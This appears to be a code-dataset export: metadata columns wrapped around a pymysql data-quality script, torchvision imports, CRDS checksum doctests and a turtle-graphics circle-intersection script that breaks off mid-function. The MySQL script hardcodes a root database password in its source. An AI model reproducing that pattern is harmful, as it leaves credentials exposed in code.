| 0
| 0.796178
| 0.796178
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
63b23605e301a71e7c5288370291d963f9333dd6
| 3,479
|
py
|
Python
|
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'ivanov'
import pymysql
# соединяемся с базой данных
connection = pymysql.connect(host="localhost", user="root", passwd="1112223334", db="testdb", charset='utf8', cursorclass=pymysql.cursors.DictCursor)
try:
with connection.cursor() as cursor:
#create new record
# sql = "INSERT INTO CHECK_STATUS (ID, LOAD_DATE, NONUNIQ_COUNT, ROW_COUNT, IDNULL_COUNT, IVNULL_COUNT, FVNULL_COUNT, CVNULL_COUNT, DVNULL_COUNT, IDZERO_COUNT, IVZERO_COUNT, FVZERO_COUNT, AV_INT_VALUE, AV_FLOAT_VALUE) VALUES (NULL, CURDATE(), (select count(*) from CHECK_OBJECT WHERE CONCAT(ID,INT_VALUE) IN (select * from (SELECT CONCAT(ID,INT_VALUE) AS CC FROM CHECK_OBJECT GROUP BY CC HAVING COUNT(*) > 1) subquary WHERE CC is not null) AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where ID is NULL AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where INT_VALUE is NULL AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where FLOAT_VALUE is NULL AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where CHAR_VALUE is NULL AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where DATE_VALUE is NULL AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where ID = 0 AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where INT_VALUE = 0 AND LOAD_DATE = CURDATE()), (select count(*) from CHECK_OBJECT where FLOAT_VALUE = 0 AND LOAD_DATE = CURDATE()), (select AVG(INT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE()), (select AVG(FLOAT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE()))"
sql = "INSERT INTO CHECK_STATUS " \
"(ID, LOAD_DATE, NONUNIQ_COUNT, ROW_COUNT, IDNULL_COUNT, IVNULL_COUNT, FVNULL_COUNT, CVNULL_COUNT, DVNULL_COUNT, IDZERO_COUNT, IVZERO_COUNT, FVZERO_COUNT, AV_INT_VALUE, AV_FLOAT_VALUE)" \
" VALUES (" \
"NULL," \
"CURDATE()," \
"(select count(*) from CHECK_OBJECT WHERE CONCAT(ID,INT_VALUE) IN " \
"(select * from (SELECT CONCAT(ID,INT_VALUE) AS CC FROM CHECK_OBJECT GROUP BY CC HAVING COUNT(*) > 1) subquary" \
" WHERE CC is not null) AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where ID is NULL AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where INT_VALUE is NULL AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where FLOAT_VALUE is NULL AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where CHAR_VALUE is NULL AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where DATE_VALUE is NULL AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where ID = 0 AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where INT_VALUE = 0 AND LOAD_DATE = CURDATE())," \
"(select count(*) from CHECK_OBJECT where FLOAT_VALUE = 0 AND LOAD_DATE = CURDATE())," \
"(select AVG(INT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE())," \
"(select AVG(FLOAT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE()))"
cursor.execute(sql)
connection.commit()
# закрываем соединение с БД
finally:
connection.close()
| 89.205128
| 1,360
| 0.678068
| 477
| 3,479
| 4.72327
| 0.176101
| 0.092321
| 0.173103
| 0.213049
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0
| 0.007233
| 0.205231
| 3,479
| 39
| 1,361
| 89.205128
| 0.807595
| 0.416786
| 0
| 0
| 0
| 0.071429
| 0.676383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.035714
| 0.035714
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
63bce965f7a1533a26e799f32a00a0a7b1005f81
| 135
|
py
|
Python
|
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
import random
from torchvision.transforms import functional as F
from torchvision.transforms import transforms
from PIL import Image
| 33.75
| 51
| 0.851852
| 18
| 135
| 6.388889
| 0.555556
| 0.26087
| 0.434783
| 0.53913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 135
| 4
| 52
| 33.75
| 0.982906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
898370d5e67056fc24a2ff2429d8f2a713ae1d63
| 9,153
|
py
|
Python
|
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T18:19:16.000Z
|
2019-04-11T18:19:16.000Z
|
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
import doctest
from crds.core import log, utils
from crds import tests, data_file
from crds.tests import test_config
from crds.refactoring import checksum
from crds.refactoring.checksum import ChecksumScript
def dt_checksum_script_fits_add():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/s7g1700gl_dead.fits", "added.fits")
>>> header = data_file.get_header("./added.fits")
>>> assert "CHECKSUM" not in header
>>> assert "DATASUM" not in header
>>> ChecksumScript("crds.refactor.checksum ./added.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Adding checksum for './added.fits'
0
>>> utils.clear_function_caches()
>>> header = data_file.get_header("./added.fits")
>>> assert "CHECKSUM" in header
>>> assert "DATASUM" in header
>>> ChecksumScript("crds.refactor.checksum --verify ./added.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './added.fits'
0
>>> os.remove("added.fits")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_fits_remove():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/s7g1700gl_dead_good_xsum.fits", "removed.fits")
>>> header = data_file.get_header("./removed.fits")
>>> assert "CHECKSUM" in header
>>> assert "DATASUM" in header
>>> ChecksumScript("crds.refactor.checksum --remove ./removed.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Removing checksum for './removed.fits'
0
>>> utils.clear_function_caches()
>>> header = data_file.get_header("./removed.fits")
>>> assert "CHECKSUM" not in header
>>> assert "DATASUM" not in header
>>> ChecksumScript("crds.refactor.checksum --verify ./removed.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './removed.fits'
0
>>> os.remove("removed.fits")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_fits_verify_good():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/s7g1700gl_dead_good_xsum.fits", "verify_good.fits")
>>> header = data_file.get_header("verify_good.fits")
>>> header["CHECKSUM"]
'i2PMi1MJi1MJi1MJ'
>>> header["DATASUM"]
'0'
>>> ChecksumScript("crds.refactor.checksum --verify ./verify_good.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './verify_good.fits'
0
>>> os.remove("verify_good.fits")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_fits_verify_bad():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/s7g1700gl_dead_bad_xsum.fits", "./verify_bad.fits")
>>> ChecksumScript("crds.refactor.checksum --verify ./verify_bad.fits")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './verify_bad.fits'
CRDS - WARNING - AstropyUserWarning : astropy.io.fits.hdu.base : Checksum verification failed for HDU ('', 1).
CRDS - WARNING - AstropyUserWarning : astropy.io.fits.hdu.base : Datasum verification failed for HDU ('', 1).
0
>>> os.remove("verify_bad.fits")
>>> test_config.cleanup(old_state)
"""
# ----------------------------------------------------------------------
def dt_checksum_script_rmap_verify_good():
"""
>>> old_state = test_config.setup()
>>> ChecksumScript("crds.refactor.checksum --verify data/hst.pmap")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for 'data/hst.pmap'
0
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_rmap_add_bad():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./add_bad.rmap")
>>> ChecksumScript("crds.refactor.checksum ./add_bad.rmap")() # doctest: +ELLIPSIS
CRDS - INFO - Adding checksum for './add_bad.rmap'
0
>>> ChecksumScript("crds.refactor.checksum --verify ./add_bad.rmap")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './add_bad.rmap'
0
>>> os.remove("add_bad.rmap")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_rmap_verify_bad():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./verify_bad.rmap")
>>> ChecksumScript("crds.refactor.checksum --verify ./verify_bad.rmap")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './verify_bad.rmap'
CRDS - ERROR - Checksum operation FAILED : sha1sum mismatch in 'verify_bad.rmap'
1
>>> os.remove("verify_bad.rmap")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_rmap_remove_bad():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./remove_bad.rmap")
>>> ChecksumScript("crds.refactor.checksum --remove ./remove_bad.rmap")() # doctest: +ELLIPSIS
CRDS - INFO - Removing checksum for './remove_bad.rmap'
CRDS - ERROR - Checksum operation FAILED : Mapping checksums cannot be removed for: './remove_bad.rmap'
1
>>> os.remove("remove_bad.rmap")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_rmap_verify_missing():
"""
>>> old_state = test_config.setup()
>>> _ = shutil.copy("data/hst-missing-xsum.rmap", "./verify_missing.rmap")
>>> ChecksumScript("crds.refactor.checksum --verify ./verify_missing.rmap")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for './verify_missing.rmap'
CRDS - ERROR - Checksum operation FAILED : sha1sum is missing in 'verify_missing.rmap'
1
>>> os.remove("verify_missing.rmap")
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_unsupported_asdf():
"""
>>> old_state = test_config.setup()
>>> ChecksumScript("crds.refactor.checksum data/valid.asdf")() # doctest: +ELLIPSIS
CRDS - INFO - Adding checksum for 'data/valid.asdf'
CRDS - ERROR - Failed updating checksum for 'data/valid.asdf' : Method 'add_checksum' is not supported for file format 'ASDF'
1
>>> ChecksumScript("crds.refactor.checksum --remove data/valid.asdf")() # doctest: +ELLIPSIS
CRDS - INFO - Removing checksum for 'data/valid.asdf'
CRDS - ERROR - Checksum operation FAILED : Method 'remove_checksum' is not supported for file format 'ASDF'
1
>>> ChecksumScript("crds.refactor.checksum --verify data/valid.asdf")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for 'data/valid.asdf'
CRDS - ERROR - Checksum operation FAILED : Method 'verify_checksum' is not supported for file format 'ASDF'
1
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_unsupported_json():
"""
>>> old_state = test_config.setup()
>>> ChecksumScript("crds.refactor.checksum data/valid.json")() # doctest: +ELLIPSIS
CRDS - INFO - Adding checksum for 'data/valid.json'
CRDS - ERROR - Failed updating checksum for 'data/valid.json' : Method 'add_checksum' is not supported for file format 'JSON'
1
>>> ChecksumScript("crds.refactor.checksum --remove data/valid.json")() # doctest: +ELLIPSIS
CRDS - INFO - Removing checksum for 'data/valid.json'
CRDS - ERROR - Checksum operation FAILED : Method 'remove_checksum' is not supported for file format 'JSON'
1
>>> ChecksumScript("crds.refactor.checksum --verify data/valid.json")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for 'data/valid.json'
CRDS - ERROR - Checksum operation FAILED : Method 'verify_checksum' is not supported for file format 'JSON'
1
>>> test_config.cleanup(old_state)
"""
def dt_checksum_script_unsupported_text():
"""
>>> old_state = test_config.setup()
>>> ChecksumScript("crds.refactor.checksum data/opaque_fts.tmp")() # doctest: +ELLIPSIS
CRDS - INFO - Adding checksum for 'data/opaque_fts.tmp'
CRDS - ERROR - Checksum operation FAILED : File 'data/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
1
>>> ChecksumScript("crds.refactor.checksum --remove ddata/opaque_fts.tmp")() # doctest: +ELLIPSIS
CRDS - INFO - Removing checksum for 'ddata/opaque_fts.tmp'
CRDS - ERROR - Checksum operation FAILED : File 'ddata/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
1
>>> ChecksumScript("crds.refactor.checksum --verify data/opaque_fts.tmp")() # doctest: +ELLIPSIS
CRDS - INFO - Verifying checksum for 'data/opaque_fts.tmp'
CRDS - ERROR - Checksum operation FAILED : File 'data/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
1
>>> test_config.cleanup(old_state)
"""
def test():
"""Run module tests, for now just doctests only.
test_config.setup() and cleanup() are done inline above because bracketing
the tests here does not get picked up by nose test discovery. Combining
tests into one giant docstring works but is hard to analyze and debug when
things go wrong.
"""
from crds.tests import test_checksum, tstmod
return tstmod(test_checksum)
if __name__ == "__main__":
print(test())
| 39.623377
| 131
| 0.662843
| 1,123
| 9,153
| 5.230632
| 0.120214
| 0.044263
| 0.092952
| 0.121553
| 0.846101
| 0.806946
| 0.758597
| 0.657984
| 0.57729
| 0.451992
| 0
| 0.006741
| 0.189665
| 9,153
| 230
| 132
| 39.795652
| 0.785223
| 0.813285
| 0
| 0
| 0
| 0
| 0.008282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.52
| true
| 0
| 0.36
| 0
| 0.92
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
89bec5ceb25cd9718ad4b6c93d9467f0e3ef9ba6
| 34,847
|
py
|
Python
|
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | 1
|
2015-08-15T05:25:35.000Z
|
2015-08-15T05:25:35.000Z
|
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | null | null | null |
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | null | null | null |
import math
import fvh2, fvh
import supercircle
masterCircleSet=set()
circlecalled = 0
checkcirclescalled = 0
MINOFFSET=5
class Circle():
def __init__(self,x,y,r,lm=None, keep=True):
global circlecalled
circlecalled+=1
self.keep = keep
self.center=(x,y)
self.radius=r
self.checkString=(int(x)/MINOFFSET*MINOFFSET,int(y)/MINOFFSET*MINOFFSET,r)
masterCircleSet.add(self.checkString)
self.color="black"
if not lm:
self.lm=fvh2.fvh.MyTurtle()
self.lm.tracer(False)
else:
self.lm=lm
#self.draw()
def draw(self):
#self.lm=fvh2.fvh.MyTurtle()
self.lm.pencolor(self.color)
self.lm.setup()
self.lm.penup()
fvh2.circlearound(self.center, self.radius,self.lm)
if not self.keep:
self.lm.undo()
self.lm.undo()
def drawred(self):
self.lm.pencolor('red')
self.lm.penup()
fvh2.circlearound(self.center, self.radius,self.lm)
def drawwhite(self):
self.lm.pencolor('white')
self.lm.penup()
fvh2.circlearound(self.center, self.radius,self.lm)
def setcolor(self, color):
self.color=color
def realCards(self):
self.realcards=[]
self.lm.pu()
for x in range(4):
self.lm.goto(self.center)
self.lm.seth(self.lm.towards(0,0)+90*x)
self.lm.fd(self.radius)
self.realcards.append(Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2))
def extendedCards(self, numberOfexteriorCircles):
self.cardinals=[]
angle=360.0/numberOfexteriorCircles
for x in range(numberOfexteriorCircles):
self.lm.pu()
self.lm.goto(self.center)
self.lm.seth(self.lm.towards(0,0)+180+x*angle)
self.lm.fd(self.radius)
a=Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep)
self.cardinals.append(a)
if (self.radius/2>=4):
a.extendedCards(numberOfexteriorCircles)
for card in a.cardinals:
self.cardinals.append(card)
def innerextendedCards(self, numberOfexteriorCircles):
self.cardinals=[]
angle=360.0/numberOfexteriorCircles
for x in range(numberOfexteriorCircles):
self.lm.pu()
self.lm.goto(self.center)
self.lm.seth(self.lm.towards(0,0)+x*angle)
self.lm.fd(self.radius)
a=Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep)
self.cardinals.append(a)
if (self.radius/2>=4):
a.innerextendedCards(numberOfexteriorCircles)
for card in a.cardinals:
self.cardinals.append(card)
def differentcards(self, numberOfexteriorCircles):
self.cardinals=[]
angle=360.0/numberOfexteriorCircles
for x in range(numberOfexteriorCircles):
self.lm.pu()
self.lm.goto(self.center)
self.lm.seth(self.lm.towards(0,0)+180+x*angle)
self.lm.fd(self.radius)
self.cardinals.append(Circle(self.lm.xcor(), self.lm.ycor(), self.radius/2, self.lm, self.keep))
def addCardinals(self):
self.cardinals=[]
self.cardinals.append(Circle(self.center[0]+self.radius, self.center[1], self.radius/2))
self.cardinals.append(Circle(self.center[0]-self.radius, self.center[1], self.radius/2))
self.cardinals.append(Circle(self.center[0], self.center[1]+self.radius, self.radius/2))
self.cardinals.append(Circle(self.center[0], self.center[1]-self.radius, self.radius/2))
#for eachcircle in self.cardinals:
# eachcircle.draw()
def comparetoCardinals(self):
self.primarytocardinals=[]
for eachcircle in self.cardinals:
intersectionpoints=circleinter(self.center, self.radius, eachcircle.center, eachcircle.radius)
self.primarytocardinals.append(Circle(intersectionpoints[0][0], intersectionpoints[0][1], self.radius))
self.primarytocardinals.append(Circle(intersectionpoints[1][0], intersectionpoints[1][1], self.radius))
def checkCircles(circle1, circle2):
global checkcirclescalled
checkcirclescalled+=1
points=circleinter(circle1.center, circle1.radius, circle2.center, circle2.radius)
if points:
points=((float("%.2f" % points[0][0]),float("%.2f" % points[0][1])),(float("%.2f" % points[1][0]),float("%.2f" % points[1][1])))
return points
def circleinter((x0, y0), r0, (x1, y1), r1):
"""
This modules accepts two circles and then determines where they meet.
the circles are submitted as x,y,r where x,y is the center of the circle
and r is the radius.
"""
dx=float(x1-x0)
dy=float(y1-y0)
d=(dx**2+dy**2)**0.5
if (d>(r0+r1)):
return None
if (d< math.fabs(r0-r1)):
return None
if (d==0):
return None
a = ((r0*r0) - (r1*r1) + (d*d)) / (2.0 * d)
x2 = x0 + (dx * a/d)
y2 = y0 + (dy * a/d)
h = ((r0*r0) - (a*a))**0.5
rx = -dy * (h/d)
ry = dx * (h/d)
xi = x2 + rx
xi_prime = x2 - rx
yi = y2 + ry
yi_prime = y2 - ry
return (xi,yi),(xi_prime,yi_prime)
def differentCircles(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
filenameZip=zip(filenameStrings,filenameValues)
filename=''
for values in filenameZip:
filename=filename+values[0]+str(values[1])
filename='circles/'+filename+'.eps'
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
ts=lm.getscreen()
circlelist=[]
newlist=[]
primaryCircle=Circle(0,0,primaryCircleRadius,lm)
primaryCircle.draw()
circlelist.append(primaryCircle)
for circle in range(numberOfSecondaryCircles):
lm.pu()
lm.goto(primaryCircle.center)
lm.seth(circle*secondaryCircleTheta)
lm.fd(primaryCircleRadius)
temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
temp.draw()
circlelist.append(temp)
totalbefore=len(circlelist)
totalafter=0
counter=0
while(totalbefore!=totalafter):
totalbefore=len(circlelist)
for firstCircleplace in range(len(circlelist)):
firstCircle=circlelist[firstCircleplace]
for secondCircleplace in range(firstCircleplace,len(circlelist)):
secondCircle=circlelist[secondCircleplace]
thisRadius=min(firstCircle.radius, secondCircle.radius)/2
if (thisRadius<10):
continue
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
temp.draw()
newlist.append(temp)
if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
temp.draw()
newlist.append(temp)
ts.update()
counter=len(circlelist)
for item in newlist:
item.draw()
circlelist.append(item)
ts.update()
newlist=[]
totalafter=len(circlelist)
fvh2.savetocircles(lm,filename)
def differentCirclesforViewing(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
"""
This is designed with something like the following in mind:
lm=circleint.fvh2.fvh.MyTurtle()
for a in range(2,100):
for b in range(3600):
circleint.differentCirclesforAnimation(200,15,a,b/10.0,lm)
lm.clear()
and then make a gif of the results
"""
global masterCircleSet
masterCircleSet=set()
filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
filenameZip=zip(filenameStrings,filenameValues)
filename=''
for values in filenameZip:
filename=filename+values[0]+'%03d' % values[1]
filename='circles/testa/'+filename+'.eps'
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
ts=lm.getscreen()
circlelist=[]
newlist=[]
primaryCircle=Circle(0,0,primaryCircleRadius,lm)
primaryCircle.draw()
circlelist.append(primaryCircle)
colorcounter=0
for circle in range(numberOfSecondaryCircles):
lm.pu()
lm.goto(primaryCircle.center)
lm.seth((secondaryCircleTheta+(circle*secondaryCircleTheta))%360)
lm.fd(primaryCircleRadius)
temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
circlelist.append(temp)
totalbefore=len(circlelist)
totalafter=0
counter=0
while(totalbefore!=totalafter):
totalbefore=len(circlelist)
for firstCircleplace in range(len(circlelist)):
firstCircle=circlelist[firstCircleplace]
for secondCircleplace in range(len(circlelist)):
secondCircle=circlelist[secondCircleplace]
thisRadius=min(firstCircle.radius, secondCircle.radius)/2
if (thisRadius<10):
continue
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
newlist.append(temp)
if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
newlist.append(temp)
ts.update()
#masterCircleSet=set()
counter=len(circlelist)
for item in newlist:
#item.draw()
circlelist.append(item)
ts.update()
newlist=[]
totalafter=len(circlelist)
#fvh2.savetocircles(lm,filename,aheight=(primaryCircleRadius+secondaryCircleRadius),awidth=(primaryCircleRadius+secondaryCircleRadius),ax=-(primaryCircleRadius+secondaryCircleRadius)/2.0, ay=-(primaryCircleRadius+secondaryCircleRadius)/2.0 )
fvh2.savetocircles(lm,filename,togif=True)#,aheight=(primaryCircleRadius+secondaryCircleRadius),awidth=(primaryCircleRadius+secondaryCircleRadius))#,ax=-(primaryCircleRadius+secondaryCircleRadius)/2.0, ay=-(primaryCircleRadius+secondaryCircleRadius)/2.0 )
def differentCirclesforAnimation(primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta,lm=None):
"""
This is designed with something like the following in mind:
lm=circleint.fvh2.fvh.MyTurtle()
for a in range(2,100):
for b in range(3600):
circleint.differentCirclesforAnimation(200,15,a,b/10.0,lm)
lm.clear()
and then make a gif of the results
"""
filenameStrings=['primaryCircleRadius','secondaryCircleRadius','numberOfSecondaryCircles','secondaryCircleTheta']
filenameValues=[primaryCircleRadius, secondaryCircleRadius, numberOfSecondaryCircles, secondaryCircleTheta]
filenameZip=zip(filenameStrings,filenameValues)
filename=''
for values in filenameZip:
filename=filename+values[0]+str(values[1])
filename='circles/neatani/'+filename+'.eps'
if not lm:
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
ts=lm.getscreen()
circlelist=[]
newlist=[]
primaryCircle=Circle(0,0,primaryCircleRadius,lm)
#primaryCircle.draw()
circlelist.append(primaryCircle)
colorcounter=0
for circle in range(numberOfSecondaryCircles):
lm.pu()
lm.goto(primaryCircle.center)
lm.seth((secondaryCircleTheta+(circle*secondaryCircleTheta))%360)
lm.fd(primaryCircleRadius)
temp=Circle(lm.xcor(), lm.ycor(), secondaryCircleRadius, lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
circlelist.append(temp)
totalbefore=len(circlelist)
totalafter=0
counter=0
while(totalbefore!=totalafter):
totalbefore=len(circlelist)
for firstCircleplace in range(len(circlelist)):
firstCircle=circlelist[firstCircleplace]
for secondCircleplace in range(firstCircleplace,len(circlelist)):
secondCircle=circlelist[secondCircleplace]
thisRadius=min(firstCircle.radius, secondCircle.radius)/2
if (thisRadius<10):
continue
newCircles=checkCircles(firstCircle, secondCircle)
if newCircles:
if ((int(newCircles[0][0])/MINOFFSET*MINOFFSET,int(newCircles[0][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[0][0], newCircles[0][1], thisRadius,lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
newlist.append(temp)
if ((int(newCircles[1][0])/MINOFFSET*MINOFFSET,int(newCircles[1][1])/MINOFFSET*MINOFFSET,thisRadius) not in masterCircleSet):
temp=Circle(newCircles[1][0], newCircles[1][1], thisRadius,lm)
temp.setcolor(fvh.allcolors[colorcounter%len(fvh.allcolors)])
colorcounter+=1
temp.draw()
newlist.append(temp)
ts.update()
counter=len(circlelist)
for item in newlist:
#item.draw()
circlelist.append(item)
ts.update()
newlist=[]
totalafter=len(circlelist)
#fvh2.savetocircles(lm,filename)
def createDrawing(bigdiameter,diameter):
lm=fvh2.fvh.MyTurtle()
lm.setup()
lm.tracer(False)
a=Circle(0,0,bigdiameter,lm)
b=Circle(bigdiameter,0,diameter,lm)
circlelist=[a,b]
